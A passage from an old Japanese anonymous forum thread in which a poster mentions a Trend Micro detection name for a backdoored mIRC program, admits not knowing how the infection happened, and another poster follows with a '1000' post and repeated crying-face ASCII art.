>圧縮状態のこのmIRCプログラムはトレンドマイクロ製品で
>「BKDR_BHIROT.A」として検出できます
ちゃんと書いてあった・・。
でもどこから感染したのかは不明です。
992 :名無しさん@お腹いっぱい。:03/04/26 00:36
1000
___ ___
/ __ ヽ / / / / ヽ ヽ / __ ヽ
| γ / | / / / / ヽ ヽ | γ / |
| ヽ__ノ / / / / ヽ ヽ | ヽ__ノ
ヽ___丿/ / / / ヽ ヽヽ___丿
/ \
/ _ノ ,_ノ ヽ
/ / iニ)ヽ, /rj:ヽヽ ヽ
.| ;〈 !:::::::c! ' {.::::::;、! 〉 |
| (つ`''" __ `'ー''(つ |
| ///// | | /// |
ヽ γ´~⌒ヽ. / | / <泣いちゃうで?
ヽ / ヽ / | /⌒ヽ、
\/ | | ̄ ̄ ̄ ̄| / ヽ
/ __ ヽ / / / / ヽ ヽ / __ ヽ
| γ / | / / / / ヽ ヽ | γ / |
| ヽ__ノ / / / / ヽ ヽ | ヽ__ノ
ヽ___丿/ / / / ヽ ヽヽ___丿
/ \
/ _ノ ,_ノ ヽ
/ / iニ)ヽ, /rj:ヽヽ ヽ
.| ;〈 !:::::::c! ' {.::::::;、! 〉 |
| (つ`''" __ `'ー''(つ |
| ///// | | /// |
ヽ γ´~⌒ヽ. / | / <泣いちゃうで?
ヽ / ヽ / | /⌒ヽ、
\/ | | ̄ ̄ ̄ ̄| / ヽ